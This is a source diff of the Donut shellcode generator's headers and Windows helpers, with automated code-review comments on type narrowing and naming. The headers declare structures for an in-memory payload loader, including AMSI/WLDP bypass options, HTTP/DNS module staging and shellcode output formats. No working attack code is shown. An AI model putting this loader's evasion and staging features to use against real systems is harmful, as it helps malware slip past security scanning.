175 #define DONUT_BYPASS_NONE 1 // Disables bypassing AMSI/WDLP
176 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
177 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
178
179 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
180 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
181 #define DONUT_MAX_MODNAME 8
182 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
183 #define DONUT_VER_LEN 32
184 #define DONUT_DOMAIN_LEN 8
151185
152186 #define DONUT_RUNTIME_NET2 "v2.0.50727"
153187 #define DONUT_RUNTIME_NET4 "v4.0.30319"
163197 #define COMBASE_DLL "combase.dll"
164198 #define USER32_DLL "user32.dll"
165199 #define SHLWAPI_DLL "shlwapi.dll"
200 #define SHELL32_DLL "shell32.dll"
166201
167202 // Per the ECMA spec, the section data looks like this:
168203 // taken from https://github.com/dotnet/coreclr/
179214 //
180215 typedef struct _file_info_t {
181216 int fd;
182 uint64_t size;
183 uint8_t *map;
217 uint32_t len, zlen;
218 uint8_t *data, *zdata;
184219
185220 // the following are set for unmanaged or .NET PE/DLL files
186221 int type;
194229 } API_IMPORT, *PAPI_IMPORT;
195230
196231 typedef struct _DONUT_CRYPT {
197 BYTE mk[DONUT_KEY_LEN]; // master key
198 BYTE ctr[DONUT_BLK_LEN]; // counter + nonce
232 uint8_t mk[DONUT_KEY_LEN]; // master key
233 uint8_t ctr[DONUT_BLK_LEN]; // counter + nonce
199234 } DONUT_CRYPT, *PDONUT_CRYPT;
200
235
201236 // everything required for a module goes in the following structure
202237 typedef struct _DONUT_MODULE {
203 DWORD type; // EXE, DLL, JS, VBS, XSL
204 WCHAR runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL
205 WCHAR domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL
206 WCHAR cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL
207 WCHAR method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL
208 DWORD param_cnt; // number of parameters for DLL/EXE
209 WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters for DLL/EXE
210 CHAR sig[DONUT_MAX_NAME]; // random string to verify decryption
211 ULONG64 mac; // to verify decryption was ok
212 ULONG64 len; // size of EXE/DLL/XSL/JS/VBS file
213 BYTE data[4]; // data of EXE/DLL/XSL/JS/VBS file
238 int type; // EXE/DLL/JS/VBS
239 int thread; // run entrypoint of unmanaged EXE as a thread
240 int compress; // indicates engine used for compression
241
242 char runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL
243 char domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL
244 char cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL
245 char method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL
246
247 char param[DONUT_MAX_NAME]; // string parameters for both managed and unmanaged DLL/EXE
248 int unicode; // convert param to unicode for unmanaged DLL function
249
250 char sig[DONUT_SIG_LEN]; // string to verify decryption
251 uint64_t mac; // hash of sig, to verify decryption was ok
252
253 uint32_t zlen; // compressed size of EXE/DLL/JS/VBS file
254 uint32_t len; // real size of EXE/DLL/JS/VBS file
255 uint8_t data[4]; // data of EXE/DLL/JS/VBS file
214256 } DONUT_MODULE, *PDONUT_MODULE;
215257
216258 // everything required for an instance goes into the following structure
217259 typedef struct _DONUT_INSTANCE {
218260 uint32_t len; // total size of instance
219 DONUT_CRYPT key; // decrypts instance
261 DONUT_CRYPT key; // decrypts instance if encryption enabled
220262
221263 uint64_t iv; // the 64-bit initial value for maru hash
222264
223265 union {
224266 uint64_t hash[64]; // holds up to 64 api hashes
225267 void *addr[64]; // holds up to 64 api addresses
226 // include prototypes only if header included from payload.h
227 #ifdef PAYLOAD_H
268 // include prototypes only if header included from loader.h
269 #ifdef LOADER_H
228270 struct {
229271 // imports from kernel32.dll or kernelbase.dll
230 LoadLibraryA_t LoadLibraryA;
231 GetProcAddress_t GetProcAddress;
232 GetModuleHandleA_t GetModuleHandleA;
233 VirtualAlloc_t VirtualAlloc; // required to allocate RW memory for instance
234 VirtualFree_t VirtualFree;
235 VirtualQuery_t VirtualQuery;
236 VirtualProtect_t VirtualProtect;
237 Sleep_t Sleep;
238 MultiByteToWideChar_t MultiByteToWideChar;
239 GetUserDefaultLCID_t GetUserDefaultLCID;
272 LoadLibraryA_t LoadLibraryA;
273 GetProcAddress_t GetProcAddress;
274 GetModuleHandleA_t GetModuleHandleA;
275 VirtualAlloc_t VirtualAlloc;
276 VirtualFree_t VirtualFree;
277 VirtualQuery_t VirtualQuery;
278 VirtualProtect_t VirtualProtect;
279 Sleep_t Sleep;
280 MultiByteToWideChar_t MultiByteToWideChar;
281 GetUserDefaultLCID_t GetUserDefaultLCID;
282 WaitForSingleObject_t WaitForSingleObject;
283 CreateThread_t CreateThread;
284 GetThreadContext_t GetThreadContext;
285 GetCurrentThread_t GetCurrentThread;
286
287 // imports from shell32.dll
288 CommandLineToArgvW_t CommandLineToArgvW;
240289
241290 // imports from oleaut32.dll
242 SafeArrayCreate_t SafeArrayCreate;
243 SafeArrayCreateVector_t SafeArrayCreateVector;
244 SafeArrayPutElement_t SafeArrayPutElement;
245 SafeArrayDestroy_t SafeArrayDestroy;
246 SafeArrayGetLBound_t SafeArrayGetLBound;
247 SafeArrayGetUBound_t SafeArrayGetUBound;
248 SysAllocString_t SysAllocString;
249 SysFreeString_t SysFreeString;
250 LoadTypeLib_t LoadTypeLib;
291 SafeArrayCreate_t SafeArrayCreate;
292 SafeArrayCreateVector_t SafeArrayCreateVector;
293 SafeArrayPutElement_t SafeArrayPutElement;
294 SafeArrayDestroy_t SafeArrayDestroy;
295 SafeArrayGetLBound_t SafeArrayGetLBound;
296 SafeArrayGetUBound_t SafeArrayGetUBound;
297 SysAllocString_t SysAllocString;
298 SysFreeString_t SysFreeString;
299 LoadTypeLib_t LoadTypeLib;
251300
252301 // imports from wininet.dll
253 InternetCrackUrl_t InternetCrackUrl;
254 InternetOpen_t InternetOpen;
255 InternetConnect_t InternetConnect;
256 InternetSetOption_t InternetSetOption;
257 InternetReadFile_t InternetReadFile;
258 InternetCloseHandle_t InternetCloseHandle;
259 HttpOpenRequest_t HttpOpenRequest;
260 HttpSendRequest_t HttpSendRequest;
261 HttpQueryInfo_t HttpQueryInfo;
302 InternetCrackUrl_t InternetCrackUrl;
303 InternetOpen_t InternetOpen;
304 InternetConnect_t InternetConnect;
305 InternetSetOption_t InternetSetOption;
306 InternetReadFile_t InternetReadFile;
307 InternetCloseHandle_t InternetCloseHandle;
308 HttpOpenRequest_t HttpOpenRequest;
309 HttpSendRequest_t HttpSendRequest;
310 HttpQueryInfo_t HttpQueryInfo;
262311
263312 // imports from mscoree.dll
264 CorBindToRuntime_t CorBindToRuntime;
265 CLRCreateInstance_t CLRCreateInstance;
313 CorBindToRuntime_t CorBindToRuntime;
314 CLRCreateInstance_t CLRCreateInstance;
266315
267316 // imports from ole32.dll
268 CoInitializeEx_t CoInitializeEx;
269 CoCreateInstance_t CoCreateInstance;
270 CoUninitialize_t CoUninitialize;
317 CoInitializeEx_t CoInitializeEx;
318 CoCreateInstance_t CoCreateInstance;
319 CoUninitialize_t CoUninitialize;
320
321 // imports from ntdll.dll
322 RtlEqualUnicodeString_t RtlEqualUnicodeString;
323 RtlEqualString_t RtlEqualString;
324 RtlUnicodeStringToAnsiString_t RtlUnicodeStringToAnsiString;
325 RtlInitUnicodeString_t RtlInitUnicodeString;
326 RtlExitUserThread_t RtlExitUserThread;
327 RtlExitUserProcess_t RtlExitUserProcess;
328 RtlCreateUnicodeString_t RtlCreateUnicodeString;
329 RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
330 RtlDecompressBufferEx_t RtlDecompressBufferEx;
331 NtContinue_t NtContinue;
332 // RtlFreeUnicodeString_t RtlFreeUnicodeString;
333 // RtlFreeString_t RtlFreeString;
271334 };
272335 #endif
273336 } api;
274337
338 int exit_opt; // 1 to call RtlExitUserProcess and terminate the host process
339 int entropy; // indicates entropy level
340 uint64_t oep; // original entrypoint
341
275342 // everything from here is encrypted
276343 int api_cnt; // the 64-bit hashes of API required for instance to work
277 int dll_cnt; // the number of DLL to load before resolving API
278 char dll_name[DONUT_MAX_DLL][32]; // a list of DLL strings to load
279
280 union {
281 char s[8]; // amsi.dll
282 uint32_t w[2];
283 } amsi;
344 char dll_names[DONUT_MAX_NAME]; // a list of DLL strings to load, separated by semi-colon
345
346 char dataname[8]; // ".data"
347 char kernelbase[12]; // "kernelbase"
348 char amsi[8]; // "amsi"
349 char clr[4]; // "clr"
350 char wldp[8]; // "wldp"
351
352 char cmd_syms[DONUT_MAX_NAME]; // symbols related to command line
353 char exit_api[DONUT_MAX_NAME]; // exit-related API
284354
285355 int bypass; // indicates behaviour of byassing AMSI/WLDP
286 char clr[8]; // clr.dll
287 char wldp[16]; // wldp.dll
288356 char wldpQuery[32]; // WldpQueryDynamicCodeTrust
289357 char wldpIsApproved[32]; // WldpIsClassInApprovedList
290358 char amsiInit[16]; // AmsiInitialize
291359 char amsiScanBuf[16]; // AmsiScanBuffer
292360 char amsiScanStr[16]; // AmsiScanString
293361
294 uint16_t wscript[8]; // WScript
295 uint16_t wscript_exe[16]; // wscript.exe
296
297 GUID xIID_IUnknown;
298 GUID xIID_IDispatch;
362 char wscript[8]; // WScript
363 char wscript_exe[12]; // wscript.exe
364
365 GUID xIID_IUnknown;
366 GUID xIID_IDispatch;
299367
300368 // GUID required to load .NET assemblies
301 GUID xCLSID_CLRMetaHost;
302 GUID xIID_ICLRMetaHost;
303 GUID xIID_ICLRRuntimeInfo;
304 GUID xCLSID_CorRuntimeHost;
305 GUID xIID_ICorRuntimeHost;
306 GUID xIID_AppDomain;
369 GUID xCLSID_CLRMetaHost;
370 GUID xIID_ICLRMetaHost;
371 GUID xIID_ICLRRuntimeInfo;
372 GUID xCLSID_CorRuntimeHost;
373 GUID xIID_ICorRuntimeHost;
374 GUID xIID_AppDomain;
307375
308376 // GUID required to run VBS and JS files
309 GUID xCLSID_ScriptLanguage; // vbs or js
310 GUID xIID_IHost; // wscript object
311 GUID xIID_IActiveScript; // engine
312 GUID xIID_IActiveScriptSite; // implementation
313 GUID xIID_IActiveScriptParse32; // parser
314 GUID xIID_IActiveScriptParse64;
315
316 // GUID required to run XSL files
317 GUID xCLSID_DOMDocument30;
318 GUID xIID_IXMLDOMDocument;
319 GUID xIID_IXMLDOMNode;
320
321 int type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
322
323 struct {
324 char url[DONUT_MAX_URL]; // staging server hosting donut module
325 char req[8]; // just a buffer for "GET"
326 } http;
327
328 uint8_t sig[DONUT_MAX_NAME]; // string to hash
329 uint64_t mac; // to verify decryption ok
377 GUID xCLSID_ScriptLanguage; // vbs or js
378 GUID xIID_IHost; // wscript object
379 GUID xIID_IActiveScript; // engine
380 GUID xIID_IActiveScriptSite; // implementation
381 GUID xIID_IActiveScriptSiteWindow; // basic GUI stuff
382 GUID xIID_IActiveScriptParse32; // parser
383 GUID xIID_IActiveScriptParse64;
384
385 int type; // DONUT_INSTANCE_EMBED, DONUT_INSTANCE_HTTP
386 char server[DONUT_MAX_NAME]; // staging server hosting donut module
387 char http_req[8]; // just a buffer for "GET"
388
389 uint8_t sig[DONUT_MAX_NAME]; // string to hash
390 uint64_t mac; // to verify decryption ok
330391
331392 DONUT_CRYPT mod_key; // used to decrypt module
332393 uint64_t mod_len; // total size of module
333394
334395 union {
335 PDONUT_MODULE p; // for URL
336 DONUT_MODULE x; // for PIC
396 PDONUT_MODULE p; // Memory allocated for module downloaded via DNS or HTTP
397 DONUT_MODULE x; // Module is embedded
337398 } module;
338399 } DONUT_INSTANCE, *PDONUT_INSTANCE;
339400
340401 typedef struct _DONUT_CONFIG {
341 int arch; // target architecture for shellcode
342 int bypass; // bypass option for AMSI/WDLP
343 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
344 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
345 char method[DONUT_MAX_NAME]; // name of method to execute
346 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
347 char file[DONUT_MAX_NAME]; // assembly to create module from
348 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
349 char runtime[DONUT_MAX_NAME]; // runtime version to use.
350 char modname[DONUT_MAX_NAME]; // name of module written to disk
351
352 int mod_type; // DONUT_MODULE_DLL or DONUT_MODULE_EXE
353 uint64_t mod_len; // size of DONUT_MODULE
354 PDONUT_MODULE mod; // points to donut module
355
356 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
357 uint64_t inst_len; // size of DONUT_INSTANCE
358 PDONUT_INSTANCE inst; // points to donut instance
359
360 uint64_t pic_len; // size of shellcode
361 void* pic; // points to PIC/shellcode
402 uint32_t len, zlen; // original length of input file and compressed length
403 // general / misc options for loader
404 int arch; // target architecture
405 int bypass; // bypass option for AMSI/WDLP
406 int compress; // engine to use when compressing file via RtlCompressBuffer
407 int entropy; // entropy/encryption level
408 int format; // output format for loader
409 int exit_opt; // return to caller or invoke RtlExitUserProcess to terminate the host process
410 int thread; // run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API
411 uint64_t oep; // original entrypoint of target host file
412
413 // files in/out
414 char input[DONUT_MAX_NAME]; // name of input file to read and load in-memory
415 char output[DONUT_MAX_NAME]; // name of output file to save loader
416
417 // .NET stuff
418 char runtime[DONUT_MAX_NAME]; // runtime version to use for CLR
419 char domain[DONUT_MAX_NAME]; // name of domain to create for .NET DLL/EXE
420 char cls[DONUT_MAX_NAME]; // name of class with optional namespace for .NET DLL
421 char method[DONUT_MAX_NAME]; // name of method or DLL function to invoke for .NET DLL and unmanaged DLL
422
423 // command line for DLL/EXE
424 char param[DONUT_MAX_NAME]; // command line to use for unmanaged DLL/EXE and .NET DLL/EXE
425 int unicode; // param is passed to DLL function without converting to unicode
426
427 // HTTP/DNS staging information
428 char server[DONUT_MAX_NAME]; // points to root path of where module will be stored on remote HTTP server or DNS server
429 char modname[DONUT_MAX_NAME]; // name of module written to disk for http stager
430
431 // DONUT_MODULE
432 int mod_type; // VBS/JS/DLL/EXE
433 int mod_len; // size of DONUT_MODULE
434 DONUT_MODULE *mod; // points to DONUT_MODULE
435
436 // DONUT_INSTANCE
437 int inst_type; // DONUT_INSTANCE_EMBED or DONUT_INSTANCE_HTTP
438 int inst_len; // size of DONUT_INSTANCE
439 DONUT_INSTANCE *inst; // points to DONUT_INSTANCE
440
441 // shellcode generated from configuration
442 int pic_len; // size of loader/shellcode
443 void* pic; // points to loader/shellcode
362444 } DONUT_CONFIG, *PDONUT_CONFIG;
363445
364446 #ifdef __cplusplus
374456 // public functions
375457 EXPORT_FUNC int DonutCreate(PDONUT_CONFIG);
376458 EXPORT_FUNC int DonutDelete(PDONUT_CONFIG);
459 EXPORT_FUNC const char* DonutError(int);
377460
378461 #ifdef __cplusplus
379462 }
Binary diff not shown
0 id ICON "donut.ico"
1
2 1 VERSIONINFO
3 FILEVERSION 0,9,3,0
4 PRODUCTVERSION 0,9,3,0
5 BEGIN
6 BLOCK "StringFileInfo"
7 BEGIN
8 BLOCK "080904E4"
9 BEGIN
10 VALUE "FileDescription", "Donut shellcode generator"
11 VALUE "FileVersion", "0.9.3"
12 VALUE "InternalName", "donut"
13 VALUE "OriginalFilename", "donut.exe"
14 VALUE "ProductName", "Donut"
15 VALUE "ProductVersion", "0.9.3"
16 END
17 END
18 BLOCK "VarFileInfo"
19 BEGIN
20 VALUE "Translation", 0x809, 1252
21 END
22 END
3333
3434 #include <stdint.h>
3535 #include <stddef.h>
36 #include <stdio.h>
3637
3738 #ifndef ROTR32
3839 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
4950 extern "C" {
5051 #endif
5152
52 void donut_encrypt(void *mk, void *ctr, void *data, size_t len);
53 void donut_encrypt(void *mk, void *ctr, void *data, uint32_t len);
5354
5455 #define donut_decrypt(mk,ctr,data,len) donut_encrypt(mk,ctr,data,len)
5556
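Review bot: The new `donut_encrypt` prototype narrows `len` from `size_t` to `uint32_t`, so a caller that passes a `size_t` on a 64-bit target is truncated silently (only `-Wconversion` would flag it); the same narrowing is made to `Memset` in the MARU header hunk and to `mmap`/`munmap` in the mmap hunks, and `Memset` uses `unsigned int` where the others use `uint32_t`. If the 32-bit limit is deliberate — the module lengths in DONUT_MODULE are `uint32_t len`/`zlen` — say so once here, e.g. `// len is 32-bit on purpose: buffers are bounded by the uint32_t len/zlen of DONUT_MODULE; do not pass larger size_t values`, and use `uint32_t` for `Memset` as well. The added `#include <stdio.h>` is not needed by anything visible in this hunk — presumably a debug print elsewhere in the header uses it; worth confirming it is not a leftover.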
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef FORMAT_H
32 #define FORMAT_H
33
34 #include "donut.h"
35
36 #ifdef __cplusplus
37 extern "C" {
38 #endif
39
40 int base64_template(void *pic, uint32_t pic_len, FILE *fd);
41 int c_ruby_template(void *pic, uint32_t pic_len, FILE *fd);
42 int py_template(void *pic, uint32_t pic_len, FILE* fd);
43 int powershell_template(void *pic, uint32_t pic_len, FILE *fd);
44 int csharp_template(void *pic, uint32_t pic_len, FILE *fd);
45 int hex_template(void *pic, uint32_t pic_len, FILE *fd);
46
47 #ifdef __cplusplus
48 }
49 #endif
50
51 #endif
52
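Review bot: The six template prototypes take `void *pic` although a formatter only reads the shellcode, so `const void *pic` would document that the buffer is not modified and let callers pass const data; `py_template` also writes `FILE* fd` where the other five use `FILE *fd`. The name `fd` suggests an integer descriptor while the parameter is a `FILE *` stream — `out` or `fp` would read better. Nothing in the header says what the `int` return means; a one-line comment above the prototypes stating the success/failure convention every template follows would save readers a trip into the implementation.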
3434 #include <stdint.h>
3535 #include <string.h>
3636
37 void *Memset (void *ptr, int value, size_t num);
37 void *Memset (void *ptr, int value, unsigned int num);
3838
3939 #define MARU_MAX_STR 64
4040 #define MARU_BLK_LEN 16
4444
4545 #ifndef ROTR32
4646 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
47 #endif
48
49 #ifndef ROTL32
50 #define ROTL32(v,n)(((v)<<(n))|((v)>>(32-(n))))
4751 #endif
4852
4953 #ifdef __cplusplus
1212
1313 #include "mmap.h"
1414
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
15 void *mmap(void *start, uint32_t length, int prot, int flags, int fd, off_t offset)
1616 {
1717 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
1818 return MAP_FAILED;
5757 dwDesiredAccess |= FILE_MAP_COPY;
5858 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
5959 if (ret == NULL) {
60 CloseHandle(h);
6160 ret = MAP_FAILED;
6261 }
62 CloseHandle(h);
6363 return ret;
6464 }
6565
66 void munmap(void *addr, size_t length)
66 void munmap(void *addr, uint32_t length)
6767 {
6868 UnmapViewOfFile(addr);
69 /* ruh-ro, we leaked handle from CreateFileMapping() ... */
7069 }
7170
7271 #undef DWORD_HI
3434 extern "C" {
3535 #endif
3636
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
37 void *mmap(void *start, uint32_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, uint32_t length);
3939
4040 #ifdef __cplusplus
4141 }
66
77 #ifndef __WIN_TYPES
88 #define __WIN_TYPES__
9
10 /*
11 #if _MSC_VER
12 #ifndef snprintf
13 #define snprintf _snprintf
14 #endif
15 #ifndef snscanf
16 #define snscanf _snscanf
17 #endif
18 #endif
19 */
209
2110 #ifdef _MSC_VER
2211 #include <stdint.h>
7766 typedef uint16_t WCHAR;
7867 #endif
7968
80 // this might be a problem..
81 #ifndef ULONG_PTR
82 typedef ULONGULONG *ULONG_PTR;
83 #endif
84
8569 #ifndef VOID
8670 #define VOID void
8771 typedef char CHAR;
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
3838 #include <sys/stat.h>
3939 #include <inttypes.h>
4040
41 #define DONUT_ERROR_SUCCESS 0
42 #define DONUT_ERROR_FILE_NOT_FOUND 1
43 #define DONUT_ERROR_FILE_EMPTY 2
44 #define DONUT_ERROR_FILE_ACCESS 3
45 #define DONUT_ERROR_FILE_INVALID 4
46 #define DONUT_ERROR_NET_PARAMS 5
47 #define DONUT_ERROR_NO_MEMORY 6
48 #define DONUT_ERROR_INVALID_ARCH 7
49 #define DONUT_ERROR_INVALID_URL 8
50 #define DONUT_ERROR_URL_LENGTH 9
51 #define DONUT_ERROR_INVALID_PARAMETER 10
52 #define DONUT_ERROR_RANDOM 11
53 #define DONUT_ERROR_DLL_FUNCTION 12
54 #define DONUT_ERROR_ARCH_MISMATCH 13
55 #define DONUT_ERROR_DLL_PARAM 14
56 #define DONUT_ERROR_BYPASS_INVALID 15
41 #if defined(_WIN32) || defined(_WIN64)
42 #define WINDOWS
43 #include <windows.h>
44 #else
45 #define LINUX
46 #include <unistd.h>
47 #include <dlfcn.h>
48 #endif
49
50 #define DONUT_ERROR_SUCCESS 0
51 #define DONUT_ERROR_FILE_NOT_FOUND 1
52 #define DONUT_ERROR_FILE_EMPTY 2
53 #define DONUT_ERROR_FILE_ACCESS 3
54 #define DONUT_ERROR_FILE_INVALID 4
55 #define DONUT_ERROR_NET_PARAMS 5
56 #define DONUT_ERROR_NO_MEMORY 6
57 #define DONUT_ERROR_INVALID_ARCH 7
58 #define DONUT_ERROR_INVALID_URL 8
59 #define DONUT_ERROR_URL_LENGTH 9
60 #define DONUT_ERROR_INVALID_PARAMETER 10
61 #define DONUT_ERROR_RANDOM 11
62 #define DONUT_ERROR_DLL_FUNCTION 12
63 #define DONUT_ERROR_ARCH_MISMATCH 13
64 #define DONUT_ERROR_DLL_PARAM 14
65 #define DONUT_ERROR_BYPASS_INVALID 15
66 #define DONUT_ERROR_NORELOC 16
67 #define DONUT_ERROR_INVALID_ENCODING 17
68 #define DONUT_ERROR_INVALID_ENGINE 18
69 #define DONUT_ERROR_COMPRESSION 19
70 #define DONUT_ERROR_INVALID_ENTROPY 20
5771
5872 // target architecture
59 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
60 #define DONUT_ARCH_X86 1 // x86
61 #define DONUT_ARCH_X64 2 // AMD64
62 #define DONUT_ARCH_X84 3 // AMD64 + x86
73 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
74 #define DONUT_ARCH_X86 1 // x86
75 #define DONUT_ARCH_X64 2 // AMD64
76 #define DONUT_ARCH_X84 3 // AMD64 + x86
6377
6478 // module type
65 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
66 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
67 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
68 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
69 #define DONUT_MODULE_VBS 5 // VBScript
70 #define DONUT_MODULE_JS 6 // JavaScript or JScript
71 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
79 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
80 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
81 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
82 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
83 #define DONUT_MODULE_VBS 5 // VBScript
84 #define DONUT_MODULE_JS 6 // JavaScript or JScript
85
86 // format type
87 #define DONUT_FORMAT_BINARY 1
88 #define DONUT_FORMAT_BASE64 2
89 #define DONUT_FORMAT_RUBY 3
90 #define DONUT_FORMAT_C 4
91 #define DONUT_FORMAT_PYTHON 5
92 #define DONUT_FORMAT_POWERSHELL 6
93 #define DONUT_FORMAT_CSHARP 7
94 #define DONUT_FORMAT_HEX 8
95
96 // compression engine
97 #define DONUT_COMPRESS_NONE 1
98 #define DONUT_COMPRESS_APLIB 2
99 #define DONUT_COMPRESS_LZNT1 3 // COMPRESSION_FORMAT_LZNT1
100 #define DONUT_COMPRESS_XPRESS 4 // COMPRESSION_FORMAT_XPRESS
101 #define DONUT_COMPRESS_XPRESS_HUFF 5 // COMPRESSION_FORMAT_XPRESS_HUFF
102
103 // entropy level
104 #define DONUT_ENTROPY_NONE 1 // don't use any entropy
105 #define DONUT_ENTROPY_RANDOM 2 // use random names
106 #define DONUT_ENTROPY_DEFAULT 3 // use random names + symmetric encryption
107
108 // misc options
109 #define DONUT_OPT_EXIT_THREAD 1 // return to the caller which calls RtlExitUserThread
110 #define DONUT_OPT_EXIT_PROCESS 2 // call RtlExitUserProcess to terminate host process
72111
73112 // instance type
74 #define DONUT_INSTANCE_PIC 1 // Self-contained
75 #define DONUT_INSTANCE_URL 2 // Download from remote server
113 #define DONUT_INSTANCE_EMBED 1 // Self-contained
114 #define DONUT_INSTANCE_HTTP 2 // Download from remote HTTP/HTTPS server
115 #define DONUT_INSTANCE_DNS 3 // Download from remote DNS server
76116
77117 // AMSI/WLDP options
78 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
79 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
80 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
118 #define DONUT_BYPASS_NONE 1 // Disables bypassing AMSI/WDLP
119 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
120 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
81121
82 // apparently C# can support 2^16 or 65,536 parameters
83 // we support up to eight for now :)
84 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
85 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
86 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
87 #define DONUT_MAX_URL 256
88 #define DONUT_MAX_MODNAME 8
89 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
90 #define DONUT_VER_LEN 32
91 #define DONUT_DOMAIN_LEN 8
122 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
123 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
124 #define DONUT_MAX_MODNAME 8
125 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
126 #define DONUT_VER_LEN 32
127 #define DONUT_DOMAIN_LEN 8
92128
93129 typedef struct _DONUT_CONFIG {
94 int arch; // target architecture for shellcode
95 int bypass; // bypass option for AMSI/WDLP
96 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
97 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
98 char method[DONUT_MAX_NAME]; // name of method to execute
99 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
100 char file[DONUT_MAX_NAME]; // assembly to create module from
101 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
102 char runtime[DONUT_MAX_NAME]; // runtime version to use.
103 char modname[DONUT_MAX_NAME]; // name of module written to disk
130 uint32_t len, zlen; // original length of input file and compressed length
131 // general / misc options for loader
132 int arch; // target architecture
133 int bypass; // bypass option for AMSI/WDLP
134 int compress; // engine to use when compressing file via RtlCompressBuffer
135 int entropy; // entropy/encryption level
136 int format; // output format for loader
137 int exit_opt; // return to caller or invoke RtlExitUserProcess to terminate the host process
138 int thread; // run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API
139 uint64_t oep; // original entrypoint of target host file
104140
105 int mod_type; // .NET EXE/DLL, VBS,JS,EXE,DLL,XSL
106 uint64_t mod_len; // size of DONUT_MODULE
107 void *mod; // points to donut module
141 // files in/out
142 char input[DONUT_MAX_NAME]; // name of input file to read and load in-memory
